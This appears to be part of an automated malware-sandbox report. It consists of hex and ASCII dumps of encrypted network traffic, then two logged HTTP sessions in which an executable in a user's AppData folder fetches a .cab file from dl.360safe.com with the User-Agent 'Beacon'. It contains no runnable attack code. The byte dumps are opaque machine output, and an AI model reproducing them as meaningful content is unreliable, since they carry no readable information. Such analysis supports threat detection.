25 b2 73 60 7e 51 9f 92 20 4f 97 c3 eb b7 97 68 c6 f1 d3 db 62 ea 26 9d 86 f4 06
                                                                                      Data Ascii: G1?Q|O!uXU%U 3@-&x}1E?#AkGT:v(k"Jd3@4S8kzLV$%Zju^MY,AQBz.=]QGJOfA{Q!cstv-2-yj?,#0gq3B%s`~Q Ohb&
                                                                                      2023-08-04 16:48:40 UTC2902INData Raw: a9 b4 82 f6 3b 71 66 f8 1a f4 d6 67 b7 ce e0 f1 30 24 45 51 74 88 63 58 45 a9 67 cc bd 10 d1 f4 54 07 66 23 4e 00 61 3c 73 8b b0 73 a2 c3 35 04 16 f7 36 96 3b b3 1d a7 da c5 ad a0 67 f1 1d 5a ca 72 51 f6 fa 80 68 7e 4b cc 11 0e df 41 03 96 1a f7 89 c7 6e f0 98 5a fe 2d aa aa b6 88 c5 0b 61 0b a9 c4 28 d1 13 be a5 fb e5 57 04 90 7a 7d 16 3c eb 37 5b 77 25 5b e3 19 52 da 02 cd f2 22 3c dc 60 a5 cd 6d 86 74 4d 94 3c f3 c7 36 d3 d5 ac 47 7d 62 60 8e 41 ce ae 64 51 94 66 d2 ce 1c 32 1e ae 35 e8 03 91 87 c0 b6 ec d9 cb 17 21 26 ad cb 39 12 4d 30 04 fd f7 24 81 a2 a5 a1 eb 18 b2 8d 43 00 1a d0 ae d0 e8 43 65 0d 58 69 b9 71 47 fb 66 c9 16 03 60 81 24 43 12 b4 2e 83 d1 d4 7d d6 d0 49 74 ba 31 ea 11 f7 c6 64 88 27 e6 ed 16 89 a3 55 b4 15 cd 55 8f 54 32 c4 be 09 73
                                                                                      Data Ascii: ;qfg0$EQtcXEgTf#Na<ss56;gZrQh~KAnZ-a(Wz}<7[w%[R"<`mtM<6G}b`AdQf25!&9M0$CCeXiqGf`$C.}It1d'UUT2s
                                                                                      2023-08-04 16:48:40 UTC2906INData Raw: 20 9c 54 c9 9f ed fb e6 5d 1d 96 da fd a2 d2 c5 49 5b f9 35 40 42 aa 07 67 7c 5b 0e 0c 9e d6 5b 86 ff 88 8e ab 40 d1 e5 7e ee 15 ac c8 8b ed 32 74 1c 1b c2 e2 a7 b1 b5 06 f0 98 ec 5e 2c 67 e2 ec 00 06 36 fb f8 72 72 f6 3c 69 c9 f3 2e 04 9e 9a f1 f2 e5 9e cd e0 c1 51 50 39 d8 e2 2f 03 ec 10 dd 29 06 0a bd 72 23 5c 3c d0 a6 28 96 cf 05 0a c8 07 40 f5 5d bd 2b d2 2b 47 70 7e 23 7d 09 eb 51 af b8 c7 68 48 95 34 8a c4 b8 a3 98 6c 01 85 95 eb db 6e 49 f0 9b 0e e2 9d 03 eb de b4 a1 ab f1 06 89 bd 83 89 a1 a0 60 49 38 77 7d a9 0b 15 7e 32 b4 ac 2c 95 97 68 e9 ed cd cf 7c 07 f2 4e e0 f1 2e 54 a5 06 3c b0 50 bc da ec 44 bb 4a 1c d0 e4 53 b3 8b df 58 8b d8 2f 8c 4b 5a 76 a6 3f f3 ef be 7d 8b 90 7a 87 10 d9 1b 9d 70 3a 21 0e 83 e0 22 dc ab b5 0e 50 79 21 81 d5 7b a9
                                                                                      Data Ascii: T]I[5@Bg|[[@~2t^,g6rr<i.QP9/)r#\<(@]++Gp~#}QhH4lnI`I8w}~2,h|N.T<PDJSX/KZv?}zp:!"Py!{
                                                                                      2023-08-04 16:48:40 UTC2910INData Raw: b6 59 10 cb 40 98 7d de c9 ed 82 3e 73 81 34 c6 4d b8 e2 0c 80 13 d1 6e 96 c2 d3 32 02 0a 66 a7 5b c2 4e 79 6c f6 78 b2 fc 0b a4 68 92 10 8d a2 4d 57 7e 5b cc 02 94 ad 88 1f 2a 9a 40 44 c8 c5 9e 18 86 37 98 61 a2 a6 5c 6b f6 c7 06 ca 70 29 a2 75 c6 68 cd 07 7f 34 38 72 bd 2e 05 67 a5 36 35 6e e0 71 78 3a a8 ec f8 2b ff e8 77 00 7b d2 de 2a 40 ea aa b9 64 95 98 67 f3 69 1e ff c2 c1 02 de 1e 96 db 09 f0 a2 0c 25 9c 0f dd c0 6f 4c 69 74 2a 66 33 c7 3e 78 9e 66 4c f1 50 34 61 8f 2f ba d2 ed 2f 1e 03 ef 79 b6 ab 3d ba 6e a1 d9 ff 72 33 b9 ff 6f 30 a3 ef b0 fe f3 f2 bc ae e4 cf 97 4e f1 95 86 c5 4d f7 a6 b4 3d 09 14 85 03 8d 6e a9 fb e0 56 94 56 05 71 cf 1e 10 5c fd 2b b2 98 b9 03 eb 7c e4 00 df 18 1c d1 b2 c6 ac 07 8c c1 f8 9d a7 2d e6 2a 36 7d de 56 6a e0 38
                                                                                      Data Ascii: Y@}>s4Mn2f[NylxhMW~[*@D7a\kp)uh48r.g65nqx:+w{*@dgi%oLit*f3>xfLP4a//y=nr3o0NM=nVVq\+|-*6}Vj8
                                                                                      2023-08-04 16:48:40 UTC2914INData Raw: f1 e8 70 55 47 3f 1a 5f d3 c8 65 7c 2d 70 e6 25 3c 3d 40 de 5c 25 78 33 4e b5 49 27 d6 0f c1 fc 83 2b 3c aa 74 54 fa 18 ed 77 c8 df da e8 d3 ca fe 73 43 0f 68 f8 2b bb f1 f3 13 d4 43 07 ae 0e f5 af e1 12 4c b2 a7 fe f0 3d 5d 02 03 3c b0 01 04 a2 01 20 fd 31 74 49 80 33 00 10 e4 bd bf e7 94 a8 e6 96 b9 e6 b3 95 2e 74 78 74 30 01 00 03 0f e0 c1 3a f9 81 6e 27 d0 2a 83 b3 e6 47 3c 33 c9 12 fa 31 ba 80 39 34 ae 86 5e be d7 cb ad 69 86 6a 19 6f 74 a7 a7 8b 4f 31 6e a8 f4 0a 03 02 bf 61 aa 59 04 5c d4 01 c7 c6 d3 09 7e e3 e4 a7 9d 56 52 ce 67 4b 88 e8 34 ab c4 f5 96 16 eb 99 4d 28 3e 4a c6 d4 cd 64 0f d0 8b 0c a7 c6 e6 45 45 a6 72 c1 48 ef c9 a8 06 58 bb 43 bc a9 b4 12 20 b4 4a 74 f5 69 21 bb 15 10 ea c3 40 2d 2e d6 2b 68 57 35 99 0e 7b 85 93 97 67 22 dc c2 99
                                                                                      Data Ascii: pUG?_e|-p%<=@\%x3NI'+<tTwsCh+CL=]< 1tI3.txt0:n'*G<3194^ijotO1naY\~VRgK4M(>JdEErHXC Jti!@-.+hW5{g"
                                                                                      2023-08-04 16:48:40 UTC2918INData Raw: 06 e2 56 50 d2 a0 5b 2c 73 5a 4d bc ac 28 c2 25 b6 5a bd 86 d5 c6 5b 2b b9 15 c6 98 f3 7f 0c b7 83 6a 39 b1 74 39 ed bb 8d a4 59 1c f7 2b 6e 6e 8f a3 ce ca 59 f3 a4 73 7e 7b 76 3f cf 72 36 6d 96 f9 75 6f ab 11 8c cd d9 a6 bf 66 70 bf 57 42 ce 9a 27 ed 3f 85 5f 86 0b dd 67 fd e3 8f 58 4f dd 16 69 af 1f c9 52 49 05 1a 2e 03 55 19 8a e0 12 3d 78 03 6d 55 c1 27 e7 13 3b 2f 0d a6 7e 3a 00 7f a7 2f 89 e9 62 50 3a 3c c1 59 ed 0a 27 d9 15 f7 cb 3c 1a 14 69 be 34 45 2b 77 42 f2 f7 f2 74 3e 32 71 e1 bd 86 f3 0c 4f 6c c0 98 e9 e2 4b d3 8a 22 ca 88 35 a6 24 f0 bc a1 56 a3 b2 3a 61 61 6b 28 71 fb c6 1d 7c b5 39 e6 77 16 2f 2f 3f b9 06 f8 6a c5 d4 cd 7e e1 3f e0 0c c0 c5 23 31 72 1a 24 e2 13 9c 53 ae ba 05 74 b1 a6 ca 94 70 38 d6 aa 5d a8 8d 58 ad c1 ab e0 5e 2e 0e e5
                                                                                      Data Ascii: VP[,sZM(%Z[+j9t9Y+nnYs~{v?r6muofpWB'?_gXOiRI.U=xmU';/~:/bP:<Y'<i4E+wBt>2qOlK"5$V:aak(q|9w//?j~?#1r$Stp8]X^.
                                                                                      2023-08-04 16:48:40 UTC2922INData Raw: 06 e5 9a f4 a5 aa d5 a5 aa c4 21 d0 39 e4 23 9c c1 ec 82 85 72 cb 1f 19 35 44 27 f2 b9 1a cf 55 68 53 64 fc 9d c3 49 cf 4a e0 47 ce cb fb 0e 77 d2 7f 60 15 ea 80 20 ca 2b 04 57 03 a5 6b 9f dc 64 71 d5 53 3c e0 94 6e 9b ac 9f 01 18 9c 66 2b 04 90 b7 3e 29 4e be e1 87 c1 ec 34 f8 b1 25 16 5c 8d ae d1 dd 5c ee f5 de ca a3 9f f6 75 43 aa 74 7f 05 81 20 e3 52 64 2c 5c f2 c2 b5 7e 80 94 14 8c d6 e3 f5 72 72 a3 b9 f4 6d 52 64 1e ac f6 62 a5 cb 86 88 d6 c4 0b 6e 6a de d4 30 82 87 23 e1 34 56 fd fb 5c f2 d8 12 f3 74 e8 82 cb 4d 06 47 39 df c5 e5 c9 f9 1f 1c 99 e0 ff 2c d3 82 c1 18 2a 7a 1e ab 2e 88 22 2d 58 d2 23 68 94 fd a1 f2 d5 93 f7 a5 91 68 b3 a9 c6 58 ef 9d 42 a0 f5 2f dc 79 29 ca 4d 19 b8 96 21 b5 98 fe c1 f5 23 80 7c 31 f6 97 76 83 f3 24 7c e3 2f 2a 4a d5
                                                                                      Data Ascii: !9#r5D'UhSdIJGw` +WkdqS<nf+>)N4%\\uCt Rd,\~rrmRdbnj0#4V\tMG9,*z."-X#hhXB/y)M!#|1v$|/*J
                                                                                      2023-08-04 16:48:40 UTC2926INData Raw: 73 f8 05 11 13 29 99 76 a2 e6 83 90 bc 81 ed e9 50 7b 7d 92 5d bd 1b e9 e8 a6 2c fc 64 83 d2 ce c7 4f 91 91 6b eb 06 68 5b af 1a fe a4 41 c7 b0 fc 4c ae 5c 8a 34 6a 1f 47 ab 55 7e 82 a7 d9 ee f8 1a 18 93 ad ff 8d f7 32 d5 6a 4b 4b f3 31 1d b6 6d 98 9d ff 7f 71 5a c7 06 0b 2d 69 be f6 35 ec 30 0c 14 e7 e7 0b 5e 25 f5 c5 3f 20 ef bf 0a 5f 88 c5 17 e3 0e 31 35 65 8c 32 2d f9 8d 45 b8 a9 89 77 e5 fa 1d ab 7a e3 c5 c7 db de 6c 76 8f 6e ea 05 87 5a e8 d3 3a 3d d0 20 de 1c 00 17 bf ac d7 9a 7f 26 a4 ba 92 8f 87 15 77 cc 7c b7 41 c7 91 b5 c3 2d 1e ec 83 59 b8 61 8b 81 5c 89 3b 8c d2 7f d8 c7 b6 0f 16 38 eb e2 e7 38 0e 2b c2 b6 9b fa 85 c0 52 41 f3 a7 c9 d5 d4 b8 36 80 53 8e 68 e9 12 16 eb e6 9a 08 7f 54 de c7 0e 03 0a d2 6a 44 ab 43 7f 46 d6 e4 62 1d f2 e6 54 73
                                                                                      Data Ascii: s)vP{}],dOkh[AL\4jGU~2jKK1mqZ-i50^%? _15e2-EwzlvnZ:= &w|A-Ya\;88+RA6ShTjDCFbTs
                                                                                      2023-08-04 16:48:40 UTC2930INData Raw: 57 bd c1 a1 34 36 fb a0 40 a7 5f 41 32 ff 65 95 11 78 74 71 75 bc 03 cf 4c ee 9d 75 95 96 1f c8 59 e3 83 5e 1a c7 53 29 04 1c 06 8e a2 af 41 84 f0 11 cb d1 41 13 8e 97 b0 c2 bf 5a 5b 5e ad 36 cb 5c 2c ad e3 88 17 a8 56 6e 33 16 83 b6 01 80 aa d2 a5 d0 4b 1f ea d1 a1 04 93 8e 9f b1 24 c8 d8 99 c9 40 a4 c4 cf c9 a5 bd e9 d9 4d 10 80 a2 27 7d 85 2d 0c 9b b5 5a 8f c1 25 97 5a fd d7 a0 6f 84 72 a2 e6 44 eb e0 69 12 63 4a ff 38 23 9f b8 97 ab 27 b8 8e f0 ff a7 cd f3 ed f6 c1 99 c1 22 d7 4d a6 2b 1a 90 72 70 ff 2c 4a 2f 8f 8b e3 95 3e 69 06 32 e4 d8 03 da 60 a2 1b 5e fb fd b4 81 03 1a 66 28 f8 f0 08 13 54 20 fd 30 a3 20 12 47 46 3c b0 3d fb 68 1e 93 4d cc 7a 67 b1 65 f0 f0 e3 17 53 a8 e1 ae ad be 1b 27 3d 20 25 1e f9 ad b0 d3 33 17 ae ac eb 1a 99 e7 d1 d8 0c f6
                                                                                      Data Ascii: W46@_A2extquLuY^S)AAZ[^6\,Vn3K$@M'}-Z%ZorDicJ8#'"M+rp,J/>i2`^f(T 0 GF<=hMzgeS'= %3
                                                                                      2023-08-04 16:48:40 UTC2934INData Raw: b2 a3 da 0b 99 8a 10 29 9a 78 bb 60 23 82 68 75 fb 1b 2b 7f a0 67 5a cb 9a cc 25 22 12 8b 7d 15 f3 59 d9 f7 c7 ad 4a 34 05 e9 08 71 22 fb 13 89 a9 84 cd 7f c9 77 d4 62 be 7c 06 61 ae 42 db 72 5f 5f 62 50 55 8b 10 e1 b5 83 21 c3 a2 01 35 e0 f3 f8 83 b5 b6 b4 aa 63 07 53 69 87 07 ec 7b 16 4b d4 6c 10 75 02 85 94 f0 54 72 71 de 33 db fe 29 82 c0 94 cb 21 3f 5c 91 ce 7b d8 98 4c ae 2d f5 ea 4a 4b bb 9e 08 b2 53 70 67 77 a6 83 93 4d a8 73 53 50 25 b5 84 d1 7d 17 4e 17 02 5a 6d 58 ab 6a c7 14 c7 b5 4f 0c a6 32 a9 89 5f 89 18 58 90 27 f1 c5 08 88 bc 2f 54 00 b4 63 99 6f 42 bd 81 21 5d 4d a0 fc ce ae 60 2f 90 a8 aa 5f b3 1b 48 f2 be 13 62 1a fb e7 5d e7 da bc 77 01 8e 36 1d 74 7f 22 cb 2a 05 0a 39 38 1a 48 b4 74 ac 80 f8 9e c5 48 c2 d5 92 68 6b 3d de 8d f8 07 e5
                                                                                      Data Ascii: )x`#hu+gZ%"}YJ4q"wb|aBr__bPU!5cSi{KluTrq3)!?\{L-JKSpgwMsSP%}NZmXjO2_X'/TcoB!]M`/_Hb]w6t"*98HtHhk=
                                                                                      2023-08-04 16:48:40 UTC2938INData Raw: 97 3c b6 00 24 df dc 78 c4 9a 4e 6c fc 9d fd 38 72 52 09 0d fd 5b 64 30 30 63 b0 08 c8 0c 82 a9 73 f8 18 18 b0 88 30 ac af d9 8b 99 3b ae 91 3b 70 d5 10 e8 4f b8 a7 67 e4 d7 b5 30 63 48 7c e0 f8 45 1a 30 c7 30 48 d4 fc 38 fe b9 a6 a0 8c 7a 56 2b 32 da b5 18 9a 46 39 25 c7 22 fe 00 ea 42 3e 7c 73 0c 25 96 8a d4 0f a4 39 24 aa ea 30 78 7f 21 c3 67 27 10 a7 b2 24 3a 58 c6 81 ba 78 98 8c 15 78 f2 bc 47 16 b6 7d 82 b8 8d 22 10 7c d5 31 5c 08 3e bf ad 40 aa 90 4c 2f cb d8 2c 16 c9 f2 b5 eb 32 1e d2 64 ce 66 77 26 83 9b 97 bf fb 09 49 48 44 07 91 cd 2f ab b6 26 0b 17 c8 97 32 75 d3 56 56 08 b2 36 a8 66 db f2 29 0b 62 79 bf 3e 2d 7f 52 fe 07 48 4a 62 68 d0 c5 97 5a a6 26 d6 3a 53 f6 73 4c 1e 3f 0c 40 58 6b 60 da 3f fd fb c0 54 5e 0c 49 c5 58 05 07 64 7a 0a 18 2a
                                                                                      Data Ascii: <$xNl8rR[d00cs0;;pOg0cH|E00H8zV+2F9%"B>|s%9$0x!g'$:XxxG}"|1\>@L/,2dfw&IHD/&2uVV6f)by>-RHJbhZ&:SsL?@Xk`?T^IXdz*
                                                                                      2023-08-04 16:48:40 UTC2942INData Raw: ae dd d4 2c df 7e 95 f5 7a d6 cd cd 38 07 3d 1c 3a cb f1 81 4a 12 ae 90 44 e8 31 4e 1d 51 fc d0 4b 4f 6a 8e 91 7f d4 55 a5 53 c8 f4 c6 83 dc 91 21 6d 99 1a 5c 20 f6 de d3 4c 9e ec 16 91 62 c6 86 72 e5 15 26 7c 30 3a 28 86 8e e5 96 d2 04 1d 6f 10 cf 3e 22 30 85 d7 00 dd 7b 5b 33 d5 d6 78 95 7c 45 98 d5 29 0b 83 64 8c 40 6b d4 e5 b2 25 52 20 9a c8 d0 35 13 0c 0a 2d dc 9b 29 3b f5 47 45 c0 d9 f5 90 87 53 64 87 66 c4 a1 b5 1c 7f 58 65 8e c2 bb 3b 19 02 fb e2 58 46 71 3f 31 8a 76 09 d6 bb ef c5 e3 c7 1c 4d 5c 36 b1 2a 1e 54 14 07 37 f1 f9 5c a5 9e 60 24 f5 12 b0 2b 94 2e 96 e8 b0 ac 7c fe 5f 43 c7 f8 48 3b e6 2e 0c 95 95 9f 2e a8 76 0e 1b e9 a1 57 03 32 67 c2 e7 45 17 74 72 8d 4d 4e 07 dd 83 ad 1f 52 85 48 b5 44 7d 91 54 13 10 45 48 d4 3b 33 d2 ce 95 4b 5e 4f
                                                                                      Data Ascii: ,~z8=:JD1NQKOjUS!m\ Lbr&|0:(o>"0{[3x|E)d@k%R 5-);GESdfXe;XFq?1vM\6*T7\`$+.|_CH;..vW2gEtrMNRHD}TEH;3K^O
                                                                                      2023-08-04 16:48:40 UTC2946INData Raw: 78 be 19 4d 5f 01 6a a2 9e b7 8c d0 c8 94 0c e1 51 a1 20 b8 be ba 3d 02 8b e7 dc 2f 26 eb c8 60 5c f1 79 9c 57 33 37 bb 2e 82 1f 51 2d 6e 6a e0 81 e7 c1 16 60 96 88 44 ab 90 3d 2c 7f 45 06 79 7b 0f 13 6a b2 5d 4f a6 d3 84 3e 09 c9 17 67 09 f1 ac 8d 76 95 48 94 10 75 7d 2e 1b a1 d4 79 ff e9 86 a8 94 d3 cb 9b 2e 49 bc 08 4c d3 87 9c 3e 01 73 4e a2 2e a2 8a 23 d4 7e c8 d6 00 e9 5b 9d 61 92 20 9f 3e 6a c2 e9 d7 e6 15 23 d7 b4 40 28 85 69 1d 55 72 29 85 66 78 77 0b 7f bf 1f 91 2f 98 c1 20 71 5e 87 de 1a 4d ba de f4 25 11 b0 68 5c c9 c2 3d cd 27 be 24 a1 e3 29 fb e4 ef 78 76 28 96 c8 40 e0 35 66 be 6a 89 6c b0 ad c7 38 bf e2 5f 89 00 88 a4 46 d5 f6 bd 16 70 d0 98 28 d0 80 45 a6 a6 bf f9 46 03 da d1 03 1b ea b9 fc 7b df e2 ee e5 b9 77 ad 27 ee 18 04 0a 3b 0e 4c
                                                                                      Data Ascii: xM_jQ =/&`\yW37.Q-nj`D=,Ey{j]O>gvHu}.y.IL>sN.#~[a >j#@(iUr)fxw/ q^M%h\='$)xv(@5fjl8_Fp(EF{w';L
                                                                                      2023-08-04 16:48:40 UTC2950INData Raw: f6 a6 58 ef cd e9 68 dc f8 bf 42 24 30 36 59 2a 15 63 77 4e 1b ad 13 28 7e 61 dd c6 d2 9c b7 85 c2 3b bd 5c f2 76 4b 77 73 be 96 5a f3 75 18 9f 01 a1 4b bf 31 70 f1 3b 12 5d ad 7f 9a 2e a7 c1 13 aa 42 1e 2e cc 38 7c 8b 21 1b 51 58 43 16 3f 82 f0 13 96 a8 43 ff e5 09 80 8f e3 fe 72 d9 34 c6 e6 b0 45 48 50 99 3c aa fe 1c 17 83 6b 73 8a 06 0c 3c 60 20 8d 81 73 a6 c1 76 9a de 48 00 f3 50 6f f4 47 d7 3e ff 94 42 93 2e 90 fc 67 df f1 a9 5b ba 62 95 7d ba 81 ad d1 20 bc 40 bd 58 81 00 f1 28 46 60 28 e7 79 a7 2a 67 08 f3 62 6b 68 ed e8 8a a2 45 a2 51 a2 4f de 1a c5 e5 d0 82 e7 75 cb f3 43 0f 31 44 b4 b1 d6 8a 4e 18 54 83 9d 32 f1 d8 57 9f 3b a7 34 a5 3b d8 f8 40 97 e0 41 65 09 d6 94 79 9a b4 f1 31 a4 2b 85 f5 52 e6 28 5a 55 3b 57 0a 38 41 c9 3e 9c 66 99 f1 36 43
                                                                                      Data Ascii: XhB$06Y*cwN(~a;\vKwsZuK1p;].B.8|!QXC?Cr4EHP<ks<` svHPoG>B.g[b} @X(F`(y*gbkhEQOuC1DNT2W;4;@Aey1+R(ZU;W8A>f6C
                                                                                      2023-08-04 16:48:40 UTC2954INData Raw: 86 9c 16 97 da f1 b7 4d 66 c5 d2 4e 8a 4b 28 33 75 49 cf ee c8 4b f7 41 4c 82 22 fa e0 d5 3b dc b4 70 e1 ff 90 ce 7a 1e 16 0d 96 0d 2a 5b 91 d0 86 94 8d 75 6c 91 78 7d ba a4 6c 2f bf 03 6f d7 df 10 ac ec 00 d5 0c 4f 5f 81 b1 8c d2 40 63 50 47 b0 2a c6 1f bb bf 8a 8f 3b 0e d1 f1 76 f9 12 5f d1 c2 92 60 09 5c 38 c0 6f b5 c2 1f 99 96 09 11 88 27 9b 42 99 8e 01 ee 71 b0 b9 68 80 4d 93 a6 f2 f4 9d e7 eb d5 52 08 37 2c e9 c7 ba 34 90 56 92 6e 2f 77 94 cc 76 d1 08 e5 a8 c2 5f 99 51 ab c8 d4 d3 4c 6e e7 03 02 90 df 3c 86 c5 3a 8b 13 11 08 a3 2d 46 f6 af fd 90 70 ff b3 0e d5 13 29 87 24 6b 6e 28 fc 82 6f ad a6 c8 6c 34 6f c9 79 54 ba d7 f0 40 8e 10 fc 36 4e ea d5 b6 35 fe 08 86 10 d9 a4 e8 2a c3 70 b7 65 71 f2 38 57 cd 17 aa 5a fa 72 cb fb 6c c2 f6 1f 2b 57 9b ea
                                                                                      Data Ascii: MfNK(3uIKAL";pz*[ulx}l/oO_@cPG*;v_`\8o'BqhMR7,4Vn/wv_QLn<:-Fp)$kn(ol4oyT@6N5*peq8WZrl+W
                                                                                      2023-08-04 16:48:40 UTC2958INData Raw: 77 7b 67 95 94 1c 07 cd c7 03 b2 22 6b 72 86 99 0a 09 c4 e5 53 c0 c9 fd b3 47 51 6f bf 92 3e 5b d3 f2 5b 68 44 6e 0d dc f5 5b 03 92 a1 8d dd 99 69 ff 48 e2 fa 85 72 0a a7 43 f4 e1 a8 d9 df 02 bc 3a 88 6c 6f ec 72 38 7d 45 f1 fe 67 4e 88 1c 5f f8 c1 a9 33 a1 f0 7f 8d 02 0c 68 67 1e c3 2b 8c f2 7b 35 ce 29 0c 8b 92 fe e4 f3 88 48 74 48 76 ae 2a 02 60 f3 cc d7 be 8b 5e 3a 05 28 6c ba b9 e4 98 d4 8d bb 6b e3 ab db 40 0a 18 fa 92 2c 35 52 92 52 d1 28 61 9b da c3 66 24 41 40 32 66 a0 84 48 f1 26 d3 b5 1c 68 3a 88 02 52 e1 5a c9 fe 1f 40 85 fe a7 66 ee ef c1 df c6 c0 18 f1 8a aa 63 3d af 4e a2 82 ea 02 9f 88 40 0b 12 8f 39 e4 ee bd cb cd 47 3f 3a b1 66 3e 07 77 0e 50 5f 44 15 35 2c db 6a 17 39 47 b7 19 d8 b0 f0 a6 e0 65 2c 47 c7 3e 59 59 4d 32 59 e7 40 76 30 34
                                                                                      Data Ascii: w{g"krSGQo>[[hDn[iHrC:lor8}EgN_3hg+{5)HtHv*`^:(lk@,5RR(af$A@2fH&h:RZ@fc=N@9G?:f>wP_D5,j9Ge,G>YYM2Y@v04
                                                                                      2023-08-04 16:48:40 UTC2962INData Raw: 1e 6f 63 c4 de 53 e5 8e bc e2 91 04 28 4f 6e 5d b0 e0 42 b0 3e 7e 84 57 28 26 03 32 44 af 8a 0b 3c 78 75 00 3c 6f 2b 21 94 2b fc a8 42 10 63 4a e1 2e 38 0c 06 aa a0 34 e2 79 2e cb 09 a5 9e aa 8f ff 05 0d 34 c7 24 3a e6 f7 73 24 29 a3 74 a3 98 5c 95 ed 5a bd 21 b8 c1 54 0c 4a 23 7e 52 91 f8 3f 29 81 e6 c7 5c 5a 34 29 9c 4f 08 32 4f b5 77 c7 e2 4a c5 1d 2b 35 74 9a d2 93 5a d6 f9 db 07 37 34 d1 43 a0 78 a2 12 7c 0a e7 b0 76 52 97 cd 03 05 11 b8 60 00 0a fa fa 30 28 87 ff f2 95 88 2f 9a 66 d2 cd 69 19 0a 80 33 e4 6f 92 b3 7f fa 5d 16 19 a7 09 f4 4b f9 9f 9e a1 f1 d6 96 59 28 f1 fd f2 eb 9e 08 ad 6c 32 df 58 98 61 a4 79 17 4c be ae 6a 6c 86 55 7d c7 6d 29 d7 92 f4 a0 12 43 55 ec b5 23 e4 6f c5 c3 3b c2 ce 85 41 c5 23 f9 82 98 9c 67 d5 91 92 5e 3f 42 48 c5 c2
                                                                                      Data Ascii: ocS(On]B>~W(&2D<xu<o+!+BcJ.84y.4$:s$)t\Z!TJ#~R?)\Z4)O2OwJ+5tZ74Cx|vR`0(/fi3o]KY(l2XayLjlU}m)CU#o;A#g^?BH
                                                                                      2023-08-04 16:48:40 UTC2966INData Raw: 7b f4 5e db ac 00 a8 e1 5c 47 87 43 3c f9 f9 b0 2e b3 ca b2 1d 25 b1 2e 67 fb ff a0 64 fe 39 3a 8e dc fe 9d f1 07 aa 08 51 b3 dc 01 af 25 e6 67 a3 77 b7 c6 22 bf e1 1c 13 f2 de 79 9d 0c ab bf c0 c7 68 1a 07 b7 ce dd f6 49 ac 81 92 52 1b cb c8 35 ab a6 f8 fd 80 d2 46 8d 16 dd 18 f5 41 c8 d3 00 37 25 da 32 8f dd 99 df f7 33 eb f3 3f 12 c1 b8 26 97 7b 71 3d 64 53 5d 92 40 0b b1 26 ca fa 03 92 46 bc e2 f8 55 7d f6 e7 36 f0 7b 53 8c a6 1f 61 61 b1 da 80 8d c1 e8 bb 0c 36 5b a5 2a 4f 62 90 91 e7 12 a1 54 2d 4c 86 e2 cb ed 86 d6 39 53 86 98 68 90 b0 8b 0e a2 89 26 f7 79 41 ac 42 74 d5 ed 0b 38 1b 64 d9 b4 c6 a9 17 cb ce 85 df 7a 43 6e e9 50 79 83 37 b0 cd 1d a3 09 5f bf 32 b7 84 f3 2b 62 38 1a 6f 98 37 93 5f 60 79 48 0c fe 4d d7 b5 a5 17 0d c3 2a 8c c1 f1 f2 db
                                                                                      Data Ascii: {^\GC<.%.gd9:Q%gw"yhIR5FA7%23?&{q=dS]@&FU}6{Saa6[*ObT-L9Sh&yABt8dzCnPy7_2+b8o7_`yHM*
                                                                                      2023-08-04 16:48:40 UTC2970INData Raw: 31 bd c2 58 17 37 fc 7a 11 c3 66 e5 75 10 cb dc ea d3 e1 09 a2 b0 c3 28 a6 f7 a8 49 84 c8 5d 4b 62 f4 0e 45 27 2f eb 3b d5 c6 6e 72 f8 1d 45 ab ad 24 86 84 87 80 bd 84 16 11 ec 85 62 3a 7c 85 7b be d7 e6 d0 22 6c 89 c4 45 e9 09 97 92 b8 64 41 e9 f6 f0 1e f9 8b a9 68 58 fa 38 73 64 6e 60 8f f0 2a 82 9f 43 24 7c ad 79 cd cb 60 a8 a0 c6 c7 8d c7 d2 a6 90 16 61 7a 8d aa a5 7c b3 37 57 8c e3 cf a2 93 65 50 3d c5 88 0a 9b e0 14 9e ae 72 42 37 ab 38 87 32 e0 f9 d4 e3 13 12 e6 6e 79 ca 85 c7 6c b1 27 37 6f 5e 3e 52 ca ec 08 f1 df 68 ec c9 25 23 5e fa de 0b 22 ef c4 1b 9b ec b8 6e 39 9e 0f 0e f5 2f e2 26 5a 98 02 cd bb 7d 96 b4 ae 9d 8d e5 14 45 9c ee 51 18 b7 a8 1a 6c 12 0e 3f c4 d4 b7 44 1a 8d f3 2a 33 64 2d ec 4d 0e 77 1d 15 cd 7f f9 17 50 f9 59 08 52 de 02 f2
                                                                                      Data Ascii: 1X7zfu(I]KbE'/;nrE$b:|{"lEdAhX8sdn`*C$|y`az|7WeP=rB782nyl'7o^>Rh%#^"n9/&Z}EQl?D*3d-MwPYR


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      7192.168.2.349745104.192.108.19443C:\Users\user\AppData\Local\winManager\FLMgrTray.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2023-08-04 16:49:39 UTC2971OUTHEAD /gf/KitTip/KitTipConf.cab HTTP/1.1
                                                                                      User-Agent: Beacon
                                                                                      Host: dl.360safe.com
                                                                                      Cache-Control: no-cache
                                                                                      2023-08-04 16:49:39 UTC2971INHTTP/1.1 200 OK
                                                                                      Date: Fri, 04 Aug 2023 16:49:39 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 8727
                                                                                      Connection: close
                                                                                      Expires: Fri, 04 Aug 2023 16:52:25 GMT
                                                                                      Last-Modified: Wed, 02 Aug 2023 03:15:12 GMT
                                                                                      Cache-Control: max-age=1800
                                                                                      KCS-Via: HIT from w-f03.lato;MISS from back-f03.dl.lato;HIT from w-subsrc01.lato
                                                                                      K-Cache-status: MISS
                                                                                      Accept-Ranges: bytes


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      8192.168.2.349746104.192.108.19443C:\Users\user\AppData\Local\winManager\FLMgrTray.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2023-08-04 16:49:40 UTC2972OUTGET /gf/KitTip/KitTipConf.cab HTTP/1.1
                                                                                      User-Agent: Beacon
                                                                                      Host: dl.360safe.com
                                                                                      Cache-Control: no-cache
                                                                                      2023-08-04 16:49:40 UTC2972INHTTP/1.1 200 OK
                                                                                      Date: Fri, 04 Aug 2023 16:49:40 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 8727
                                                                                      Connection: close
                                                                                      Expires: Fri, 04 Aug 2023 17:19:40 GMT
                                                                                      Last-Modified: Wed, 02 Aug 2023 03:15:12 GMT
                                                                                      Cache-Control: max-age=1800
                                                                                      KCS-Via: HIT from w-f03.lato;MISS from back-f03.dl.lato;HIT from w-subsrc01.lato
                                                                                      K-Cache-status: MISS
                                                                                      Accept-Ranges: bytes
